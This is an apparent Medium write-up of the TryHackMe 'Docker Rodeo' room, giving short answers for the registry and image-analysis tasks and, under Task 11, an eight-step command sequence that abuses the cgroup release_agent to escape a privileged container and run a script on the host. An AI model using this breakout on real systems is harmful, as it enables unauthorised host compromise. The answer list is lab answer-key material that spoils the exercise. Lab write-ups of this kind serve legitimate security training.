The Docker Rodeo TryHackme Writeup

https://tryhackme.com/room/dockerrodeo

Task 5. Interacting with a Docker Registry

https://tryhackme.com

Answer: 7000

https://tryhackme.com

Answer: securesolutions/webserver

https://tryhackme.com

Answer: production

https://tryhackme.com

Answer: Admin

Answer:production_admin

Task 6. Vulnerability #2: Reverse Engineering Docker Images

#wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb#sudo apt install ./dive_0.9.2_linux_amd64.deb
https://tryhackme.com

Answer: 2a0a63ea5d88

https://tryhackme.com
https://tryhackme.com

Answer: 7

https://tryhackme.com

Answer: uogctf

Task 11. Vulnerability #7: Misconfigured Privileges (Deploy #2)

1. mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x2. echo 1 > /tmp/cgrp/x/notify_on_release3. host_path=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab`4. echo “$host_path/exploit” > /tmp/cgrp/release_agent5. echo ‘#!/bin/sh’ > /exploit6. echo “cat /home/cmnatic/flag.txt > $host_path/flag.txt” >> /exploit7. chmod a+x /exploit8. sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store